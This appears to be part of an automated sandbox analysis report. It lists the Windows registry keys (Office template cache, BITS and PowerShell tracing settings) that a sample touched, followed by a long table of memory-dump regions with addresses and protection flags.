HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328935
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851221
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851217
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851223
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851222
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851216
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328893
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851218
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328919
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328908
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851224
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851227
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457444
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
|
TM03998158
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328975
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851225
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457515
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
|
TM02835233
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457491
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851220
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851226
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03090434
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03090430
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328983
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328986
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457464
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457496
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM10001115
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457503
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM04033917
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457510
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM10001114
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM04033925
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM04033929
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM04033921
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM04033919
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM04033927
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457485
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM04033937
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
|
TM03998159
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 256 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1850C6C0000
|
heap
|
page read and write
|
|
|
|
25280F1A000
|
trusted library allocation
|
page read and write
|
|
|
|
2528191B000
|
trusted library allocation
|
page read and write
|
|
|
|
25E45AF8000
|
heap
|
page read and write
|
|
|
|
2438FF50000
|
heap
|
page read and write
|
|
|
|
243933BE000
|
trusted library allocation
|
page read and write
|
|
|
|
1850C658000
|
heap
|
page read and write
|
|
|
|
25E45B26000
|
heap
|
page read and write
|
|
|
|
156B1466000
|
heap
|
page read and write
|
|
|
|
156B3079000
|
trusted library allocation
|
page read and write
|
|
|
|
156B2FA3000
|
trusted library allocation
|
page read and write
|
|
|
|
2438FFDB000
|
heap
|
page read and write
|
|
|
|
25E45B6F000
|
heap
|
page read and write
|
|
|
|
156B13E0000
|
heap
|
page read and write
|
|
|
|
25E45D45000
|
heap
|
page read and write
|
|
|
|
24391A21000
|
trusted library allocation
|
page read and write
|
|
|
|
1850C915000
|
heap
|
page read and write
|
|
|
|
1850C687000
|
heap
|
page read and write
|
|
|
|
341B2FB000
|
stack
|
page read and write
|
||
|
E5175FE000
|
stack
|
page read and write
|
||
|
885F795000
|
stack
|
page read and write
|
||
|
2A352FE000
|
stack
|
page read and write
|
||
|
156B3474000
|
trusted library allocation
|
page read and write
|
||
|
7FFE18850000
|
trusted library allocation
|
page read and write
|
||
|
2965038000
|
stack
|
page read and write
|
||
|
24391A9E000
|
trusted library allocation
|
page read and write
|
||
|
21912C2B000
|
heap
|
page read and write
|
||
|
21912A20000
|
heap
|
page read and write
|
||
|
7FFE187D0000
|
trusted library allocation
|
page read and write
|
||
|
24390175000
|
heap
|
page read and write
|
||
|
21912C79000
|
heap
|
page read and write
|
||
|
7FFE16650000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16686000
|
trusted library allocation
|
page execute and read and write
|
||
|
341A8F7000
|
stack
|
page read and write
|
||
|
21912C5B000
|
heap
|
page read and write
|
||
|
CBE2ABB000
|
stack
|
page read and write
|
||
|
7FFE16910000
|
trusted library allocation
|
page read and write
|
||
|
7FFE165FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
21917F60000
|
trusted library allocation
|
page read and write
|
||
|
219182EE000
|
heap
|
page read and write
|
||
|
243AA208000
|
heap
|
page read and write
|
||
|
243A9FA0000
|
heap
|
page execute and read and write
|
||
|
21917FD0000
|
trusted library allocation
|
page read and write
|
||
|
252EB350000
|
heap
|
page read and write
|
||
|
7FFE165BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
252ED60E000
|
heap
|
page read and write
|
||
|
252ED5B0000
|
heap
|
page execute and read and write
|
||
|
7FFE165B2000
|
trusted library allocation
|
page read and write
|
||
|
219182F5000
|
heap
|
page read and write
|
||
|
243AA0B0000
|
heap
|
page read and write
|
||
|
2191830E000
|
heap
|
page read and write
|
||
|
156B14D8000
|
heap
|
page read and write
|
||
|
7FFE16910000
|
trusted library allocation
|
page read and write
|
||
|
21918650000
|
trusted library allocation
|
page read and write
|
||
|
CBE24FD000
|
stack
|
page read and write
|
||
|
7FFE165B4000
|
trusted library allocation
|
page read and write
|
||
|
7FFE165B0000
|
trusted library allocation
|
page read and write
|
||
|
24390130000
|
heap
|
page read and write
|
||
|
7FFE16820000
|
trusted library allocation
|
page read and write
|
||
|
2191331A000
|
heap
|
page read and write
|
||
|
7FFE167C0000
|
trusted library allocation
|
page read and write
|
||
|
2439368A000
|
trusted library allocation
|
page read and write
|
||
|
243AA056000
|
heap
|
page read and write
|
||
|
7FFE1863C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE165A2000
|
trusted library allocation
|
page read and write
|
||
|
21918140000
|
trusted library allocation
|
page read and write
|
||
|
219181A0000
|
remote allocation
|
page read and write
|
||
|
341C7FE000
|
unkown
|
page readonly
|
||
|
156B1220000
|
heap
|
page read and write
|
||
|
21913190000
|
trusted library allocation
|
page read and write
|
||
|
252EB3FF000
|
heap
|
page read and write
|
||
|
21912C90000
|
heap
|
page read and write
|
||
|
2191830A000
|
heap
|
page read and write
|
||
|
80F19AE000
|
stack
|
page read and write
|
||
|
156B1426000
|
heap
|
page read and write
|
||
|
7FFE18590000
|
trusted library allocation
|
page read and write
|
||
|
2A34EFA000
|
stack
|
page read and write
|
||
|
2A357FF000
|
stack
|
page read and write
|
||
|
21913202000
|
heap
|
page read and write
|
||
|
156B1320000
|
heap
|
page read and write
|
||
|
7FFE167B0000
|
trusted library allocation
|
page read and write
|
||
|
885FDFE000
|
stack
|
page read and write
|
||
|
7FFE168C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE165AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
156CB8A0000
|
heap
|
page read and write
|
||
|
1850C580000
|
heap
|
page read and write
|
||
|
7FFE187E0000
|
trusted library allocation
|
page read and write
|
||
|
341C1FE000
|
unkown
|
page readonly
|
||
|
7FFE16890000
|
trusted library allocation
|
page read and write
|
||
|
156B142E000
|
heap
|
page read and write
|
||
|
7FFE18770000
|
trusted library allocation
|
page execute and read and write
|
||
|
21913F21000
|
trusted library allocation
|
page read and write
|
||
|
7FFE167F0000
|
trusted library allocation
|
page read and write
|
||
|
CBE348E000
|
stack
|
page read and write
|
||
|
156CB43F000
|
heap
|
page read and write
|
||
|
CBE25FE000
|
stack
|
page read and write
|
||
|
156CB490000
|
heap
|
page read and write
|
||
|
CBE247E000
|
stack
|
page read and write
|
||
|
252ED7D0000
|
heap
|
page execute and read and write
|
||
|
7FFE16760000
|
trusted library allocation
|
page execute and read and write
|
||
|
2439368E000
|
trusted library allocation
|
page read and write
|
||
|
2191821F000
|
heap
|
page read and write
|
||
|
2507A4C0000
|
heap
|
page read and write
|
||
|
7FFE16800000
|
trusted library allocation
|
page read and write
|
||
|
219182C1000
|
heap
|
page read and write
|
||
|
243AA440000
|
heap
|
page read and write
|
||
|
7FFE18640000
|
trusted library allocation
|
page execute and read and write
|
||
|
21912D13000
|
heap
|
page read and write
|
||
|
2507A580000
|
heap
|
page read and write
|
||
|
25E45A10000
|
heap
|
page read and write
|
||
|
2964C7F000
|
stack
|
page read and write
|
||
|
252EB397000
|
heap
|
page read and write
|
||
|
21918120000
|
trusted library allocation
|
page read and write
|
||
|
25E476B0000
|
heap
|
page read and write
|
||
|
156B14D5000
|
heap
|
page read and write
|
||
|
2A356FE000
|
stack
|
page read and write
|
||
|
7FFE16900000
|
trusted library allocation
|
page read and write
|
||
|
2438FEF0000
|
heap
|
page read and write
|
||
|
243935C4000
|
trusted library allocation
|
page read and write
|
||
|
219180D0000
|
trusted library allocation
|
page read and write
|
||
|
341A9FE000
|
unkown
|
page readonly
|
||
|
885FD7E000
|
stack
|
page read and write
|
||
|
252ED88C000
|
heap
|
page read and write
|
||
|
21912CFE000
|
heap
|
page read and write
|
||
|
2A355FD000
|
stack
|
page read and write
|
||
|
7FFE18731000
|
trusted library allocation
|
page read and write
|
||
|
156B2F7C000
|
trusted library allocation
|
page read and write
|
||
|
7FFE167C0000
|
trusted library allocation
|
page read and write
|
||
|
2191825F000
|
heap
|
page read and write
|
||
|
886007A000
|
stack
|
page read and write
|
||
|
7FFE165A4000
|
trusted library allocation
|
page read and write
|
||
|
156B2EB0000
|
heap
|
page execute and read and write
|
||
|
2439308E000
|
trusted library allocation
|
page read and write
|
||
|
21913300000
|
heap
|
page read and write
|
||
|
219182F1000
|
heap
|
page read and write
|
||
|
7FFE16900000
|
trusted library allocation
|
page read and write
|
||
|
21917FE0000
|
trusted library allocation
|
page read and write
|
||
|
21912D02000
|
heap
|
page read and write
|
||
|
7FFE167F0000
|
trusted library allocation
|
page read and write
|
||
|
21913215000
|
heap
|
page read and write
|
||
|
156B141E000
|
heap
|
page read and write
|
||
|
2507A4E0000
|
heap
|
page read and write
|
||
|
E5174FF000
|
stack
|
page read and write
|
||
|
252EB470000
|
heap
|
page read and write
|
||
|
219180C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE18734000
|
trusted library allocation
|
page read and write
|
||
|
156CB570000
|
heap
|
page read and write
|
||
|
24390021000
|
heap
|
page read and write
|
||
|
2A34FFE000
|
stack
|
page read and write
|
||
|
219182A7000
|
heap
|
page read and write
|
||
|
219181A0000
|
remote allocation
|
page read and write
|
||
|
156CB5A5000
|
heap
|
page read and write
|
||
|
21912C13000
|
heap
|
page read and write
|
||
|
156B303C000
|
trusted library allocation
|
page read and write
|
||
|
7FFE18830000
|
trusted library allocation
|
page read and write
|
||
|
243AA02F000
|
heap
|
page read and write
|
||
|
252EB4B0000
|
heap
|
page read and write
|
||
|
7FFE168D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE165C0000
|
trusted library allocation
|
page read and write
|
||
|
1850C480000
|
heap
|
page read and write
|
||
|
252ED884000
|
heap
|
page read and write
|
||
|
296533B000
|
stack
|
page read and write
|
||
|
7FFE16656000
|
trusted library allocation
|
page read and write
|
||
|
7FFE186A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2964CFE000
|
stack
|
page read and write
|
||
|
21917FE2000
|
trusted library allocation
|
page read and write
|
||
|
25E45A30000
|
heap
|
page read and write
|
||
|
156B2E10000
|
heap
|
page execute and read and write
|
||
|
21913500000
|
trusted library allocation
|
page read and write
|
||
|
219182F5000
|
heap
|
page read and write
|
||
|
21913B00000
|
trusted library allocation
|
page read and write
|
||
|
21912C00000
|
heap
|
page read and write
|
||
|
2438FF97000
|
heap
|
page read and write
|
||
|
7FFE18582000
|
trusted library allocation
|
page read and write
|
||
|
252EB40B000
|
heap
|
page read and write
|
||
|
21912CB7000
|
heap
|
page read and write
|
||
|
252EB407000
|
heap
|
page read and write
|
||
|
7FFE16860000
|
trusted library allocation
|
page read and write
|
||
|
25E45AF0000
|
heap
|
page read and write
|
||
|
7FFE18636000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16840000
|
trusted library allocation
|
page read and write
|
||
|
156B14CF000
|
heap
|
page read and write
|
||
|
243A9FA6000
|
heap
|
page execute and read and write
|
||
|
219182EA000
|
heap
|
page read and write
|
||
|
252EB450000
|
heap
|
page read and write
|
||
|
7FFE168E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE1665C000
|
trusted library allocation
|
page execute and read and write
|
||
|
25281BF4000
|
trusted library allocation
|
page read and write
|
||
|
7FFE1676A000
|
trusted library allocation
|
page read and write
|
||
|
252ED5C0000
|
heap
|
page read and write
|
||
|
21912CFE000
|
heap
|
page read and write
|
||
|
2965CC3000
|
stack
|
page read and write
|
||
|
252ED7FC000
|
heap
|
page read and write
|
||
|
252ECF70000
|
heap
|
page readonly
|
||
|
252ED417000
|
heap
|
page read and write
|
||
|
7FFE18880000
|
trusted library allocation
|
page read and write
|
||
|
CBE27FD000
|
stack
|
page read and write
|
||
|
7FFE166D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
243AA005000
|
heap
|
page read and write
|
||
|
156B13E8000
|
heap
|
page read and write
|
||
|
21918304000
|
heap
|
page read and write
|
||
|
7FFE18729000
|
trusted library allocation
|
page read and write
|
||
|
2964DFE000
|
stack
|
page read and write
|
||
|
24391960000
|
heap
|
page execute and read and write
|
||
|
21918010000
|
trusted library allocation
|
page read and write
|
||
|
219180B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE1873A000
|
trusted library allocation
|
page read and write
|
||
|
341BEFC000
|
stack
|
page read and write
|
||
|
21912A00000
|
heap
|
page read and write
|
||
|
25281BD4000
|
trusted library allocation
|
page read and write
|
||
|
24392BBB000
|
trusted library allocation
|
page read and write
|
||
|
7DF4853A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
CBE29BE000
|
stack
|
page read and write
|
||
|
243A9FCE000
|
heap
|
page read and write
|
||
|
E517DFB000
|
stack
|
page read and write
|
||
|
7FFE168B0000
|
trusted library allocation
|
page read and write
|
||
|
252ED0C0000
|
heap
|
page read and write
|
||
|
21913840000
|
trusted library allocation
|
page read and write
|
||
|
24393432000
|
trusted library allocation
|
page read and write
|
||
|
252ED80D000
|
heap
|
page read and write
|
||
|
E517BFE000
|
stack
|
page read and write
|
||
|
7FFE18800000
|
trusted library allocation
|
page read and write
|
||
|
25280450000
|
trusted library allocation
|
page read and write
|
||
|
243919A3000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16780000
|
trusted library allocation
|
page execute and read and write
|
||
|
219180B0000
|
trusted library allocation
|
page read and write
|
||
|
21912CA6000
|
heap
|
page read and write
|
||
|
156B3027000
|
trusted library allocation
|
page read and write
|
||
|
7FFE165A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE168F0000
|
trusted library allocation
|
page read and write
|
||
|
156B13A0000
|
trusted library allocation
|
page read and write
|
||
|
CBE267E000
|
stack
|
page read and write
|
||
|
7FFE16890000
|
trusted library allocation
|
page read and write
|
||
|
252ED632000
|
heap
|
page read and write
|
||
|
243930AC000
|
trusted library allocation
|
page read and write
|
||
|
2438FF93000
|
heap
|
page read and write
|
||
|
252ED84C000
|
heap
|
page read and write
|
||
|
7FFE18583000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE16759000
|
trusted library allocation
|
page read and write
|
||
|
243AA1FF000
|
heap
|
page read and write
|
||
|
886017F000
|
stack
|
page read and write
|
||
|
2438FEE0000
|
heap
|
page read and write
|
||
|
2529006F000
|
trusted library allocation
|
page read and write
|
||
|
252ECF00000
|
heap
|
page read and write
|
||
|
156CB5AC000
|
heap
|
page read and write
|
||
|
252902E8000
|
trusted library allocation
|
page read and write
|
||
|
252EB449000
|
heap
|
page read and write
|
||
|
24390120000
|
heap
|
page read and write
|
||
|
156B3024000
|
trusted library allocation
|
page read and write
|
||
|
252ED5D9000
|
heap
|
page read and write
|
||
|
7FFE18780000
|
trusted library allocation
|
page read and write
|
||
|
156B1550000
|
trusted library allocation
|
page read and write
|
||
|
2507A58E000
|
heap
|
page read and write
|
||
|
21918256000
|
heap
|
page read and write
|
||
|
219185C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE187B0000
|
trusted library allocation
|
page read and write
|
||
|
156B3035000
|
trusted library allocation
|
page read and write
|
||
|
E517AFD000
|
stack
|
page read and write
|
||
|
252EB401000
|
heap
|
page read and write
|
||
|
24391C4D000
|
trusted library allocation
|
page read and write
|
||
|
243A9FF1000
|
heap
|
page read and write
|
||
|
156B1560000
|
heap
|
page execute and read and write
|
||
|
252EB444000
|
heap
|
page read and write
|
||
|
156CB370000
|
heap
|
page read and write
|
||
|
1850C620000
|
heap
|
page read and write
|
||
|
7FFE188D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE187A0000
|
trusted library allocation
|
page read and write
|
||
|
24393097000
|
trusted library allocation
|
page read and write
|
||
|
7FFE187AA000
|
trusted library allocation
|
page read and write
|
||
|
252ECF30000
|
trusted library allocation
|
page read and write
|
||
|
21918000000
|
trusted library allocation
|
page read and write
|
||
|
156B303F000
|
trusted library allocation
|
page read and write
|
||
|
219180D0000
|
trusted library allocation
|
page read and write
|
||
|
252ECF80000
|
trusted library allocation
|
page read and write
|
||
|
2438FF64000
|
heap
|
page read and write
|
||
|
21918130000
|
trusted library allocation
|
page read and write
|
||
|
243AA201000
|
heap
|
page read and write
|
||
|
7FFE1675A000
|
trusted library allocation
|
page read and write
|
||
|
252EB367000
|
heap
|
page read and write
|
||
|
25290001000
|
trusted library allocation
|
page read and write
|
||
|
156B2DE0000
|
trusted library allocation
|
page read and write
|
||
|
2A358FB000
|
stack
|
page read and write
|
||
|
21913302000
|
heap
|
page read and write
|
||
|
2438FFD6000
|
heap
|
page read and write
|
||
|
21918110000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16660000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE16660000
|
trusted library allocation
|
page read and write
|
||
|
7FFE165BB000
|
trusted library allocation
|
page read and write
|
||
|
CBE20C3000
|
stack
|
page read and write
|
||
|
243A9A2C000
|
heap
|
page read and write
|
||
|
7FFE165B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1850C560000
|
heap
|
page read and write
|
||
|
7FFE16850000
|
trusted library allocation
|
page read and write
|
||
|
219180D0000
|
trusted library allocation
|
page read and write
|
||
|
219182C8000
|
heap
|
page read and write
|
||
|
7FFE167E0000
|
trusted library allocation
|
page read and write
|
||
|
2507A794000
|
heap
|
page read and write
|
||
|
29649ED000
|
stack
|
page read and write
|
||
|
7FFE187C0000
|
trusted library allocation
|
page read and write
|
||
|
252800A0000
|
trusted library allocation
|
page read and write
|
||
|
885FFF8000
|
stack
|
page read and write
|
||
|
2A350FF000
|
stack
|
page read and write
|
||
|
7FFE16749000
|
trusted library allocation
|
page read and write
|
||
|
2191824B000
|
heap
|
page read and write
|
||
|
7FFE167B0000
|
trusted library allocation
|
page read and write
|
||
|
21912D02000
|
heap
|
page read and write
|
||
|
156B2F69000
|
trusted library allocation
|
page read and write
|
||
|
243A1A92000
|
trusted library allocation
|
page read and write
|
||
|
2965D0E000
|
stack
|
page read and write
|
||
|
252EB41D000
|
heap
|
page read and write
|
||
|
252ECFD0000
|
trusted library allocation
|
page read and write
|
||
|
CBE21CF000
|
stack
|
page read and write
|
||
|
25E45D40000
|
heap
|
page read and write
|
||
|
88602FB000
|
stack
|
page read and write
|
||
|
1850C650000
|
heap
|
page read and write
|
||
|
2438FF9D000
|
heap
|
page read and write
|
||
|
25281958000
|
trusted library allocation
|
page read and write
|
||
|
243AA26E000
|
heap
|
page read and write
|
||
|
7FFE16820000
|
trusted library allocation
|
page read and write
|
||
|
885F7DE000
|
stack
|
page read and write
|
||
|
341BFFE000
|
unkown
|
page readonly
|
||
|
7FFE18860000
|
trusted library allocation
|
page read and write
|
||
|
21912C40000
|
heap
|
page read and write
|
||
|
885FB7E000
|
stack
|
page read and write
|
||
|
243919E0000
|
trusted library allocation
|
page read and write
|
||
|
341B3FE000
|
unkown
|
page readonly
|
||
|
7FFE166C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
CBE293E000
|
stack
|
page read and write
|
||
|
341A36B000
|
stack
|
page read and write
|
||
|
156B15A0000
|
heap
|
page read and write
|
||
|
7FFE188C0000
|
trusted library allocation
|
page read and write
|
||
|
156B141C000
|
heap
|
page read and write
|
||
|
156B3042000
|
trusted library allocation
|
page read and write
|
||
|
156B1360000
|
heap
|
page read and write
|
||
|
25281BA9000
|
trusted library allocation
|
page read and write
|
||
|
2528197A000
|
trusted library allocation
|
page read and write
|
||
|
252ED864000
|
heap
|
page read and write
|
||
|
21913304000
|
heap
|
page read and write
|
||
|
2438FFB2000
|
heap
|
page read and write
|
||
|
7FFE18820000
|
trusted library allocation
|
page read and write
|
||
|
156B1428000
|
heap
|
page read and write
|
||
|
24390125000
|
heap
|
page read and write
|
||
|
243AA250000
|
heap
|
page read and write
|
||
|
885FE7D000
|
stack
|
page read and write
|
||
|
252ED6C0000
|
heap
|
page read and write
|
||
|
24390170000
|
heap
|
page read and write
|
||
|
885FEF9000
|
stack
|
page read and write
|
||
|
E5178FE000
|
stack
|
page read and write
|
||
|
156B33D6000
|
trusted library allocation
|
page read and write
|
||
|
7FFE188E0000
|
trusted library allocation
|
page read and write
|
||
|
252EB585000
|
heap
|
page read and write
|
||
|
2438FFD8000
|
heap
|
page read and write
|
||
|
7FFE187F0000
|
trusted library allocation
|
page read and write
|
||
|
252ED662000
|
heap
|
page read and write
|
||
|
252ED8AD000
|
heap
|
page read and write
|
||
|
21918130000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16790000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE18666000
|
trusted library allocation
|
page execute and read and write
|
||
|
156B13D0000
|
heap
|
page readonly
|
||
|
156B13C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE168F0000
|
trusted library allocation
|
page read and write
|
||
|
243A9FB0000
|
heap
|
page read and write
|
||
|
341C0F9000
|
stack
|
page read and write
|
||
|
CBE28BE000
|
stack
|
page read and write
|
||
|
7FFE16742000
|
trusted library allocation
|
page read and write
|
||
|
25280246000
|
trusted library allocation
|
page read and write
|
||
|
252EB3E3000
|
heap
|
page read and write
|
||
|
156B1380000
|
trusted library section
|
page read and write
|
||
|
219181A0000
|
remote allocation
|
page read and write
|
||
|
7FFE167D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16830000
|
trusted library allocation
|
page read and write
|
||
|
21912C7C000
|
heap
|
page read and write
|
||
|
156B2DE3000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16782000
|
trusted library allocation
|
page read and write
|
||
|
252ED829000
|
heap
|
page read and write
|
||
|
341AAFE000
|
stack
|
page read and write
|
||
|
21917F50000
|
trusted library allocation
|
page read and write
|
||
|
243AA290000
|
heap
|
page read and write
|
||
|
21917FE0000
|
trusted library allocation
|
page read and write
|
||
|
21918020000
|
trusted library allocation
|
page read and write
|
||
|
156C2F31000
|
trusted library allocation
|
page read and write
|
||
|
296523E000
|
stack
|
page read and write
|
||
|
156B3039000
|
trusted library allocation
|
page read and write
|
||
|
243919A0000
|
trusted library allocation
|
page read and write
|
||
|
156B15A5000
|
heap
|
page read and write
|
||
|
21912B00000
|
heap
|
page read and write
|
||
|
252ECF60000
|
trusted library allocation
|
page read and write
|
||
|
E5177FF000
|
stack
|
page read and write
|
||
|
7FFE16860000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16764000
|
trusted library allocation
|
page read and write
|
||
|
252ECD5B000
|
heap
|
page read and write
|
||
|
252ECF90000
|
heap
|
page read and write
|
||
|
252ED637000
|
heap
|
page read and write
|
||
|
24393204000
|
trusted library allocation
|
page read and write
|
||
|
2191331A000
|
heap
|
page read and write
|
||
|
88600FE000
|
stack
|
page read and write
|
||
|
2964EFF000
|
stack
|
page read and write
|
||
|
252ED590000
|
heap
|
page execute and read and write
|
||
|
243AA1FC000
|
heap
|
page read and write
|
||
|
2A353FE000
|
stack
|
page read and write
|
||
|
7FFE1859B000
|
trusted library allocation
|
page read and write
|
||
|
156B1464000
|
heap
|
page read and write
|
||
|
21918200000
|
heap
|
page read and write
|
||
|
885FF77000
|
stack
|
page read and write
|
||
|
E517CFF000
|
stack
|
page read and write
|
||
|
CBE257E000
|
stack
|
page read and write
|
||
|
7FFE16666000
|
trusted library allocation
|
page read and write
|
||
|
156B2F15000
|
heap
|
page read and write
|
||
|
7FFE167A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21912C8C000
|
heap
|
page read and write
|
||
|
25280516000
|
trusted library allocation
|
page read and write
|
||
|
24393014000
|
trusted library allocation
|
page read and write
|
||
|
2438FF10000
|
heap
|
page read and write
|
||
|
21912C25000
|
heap
|
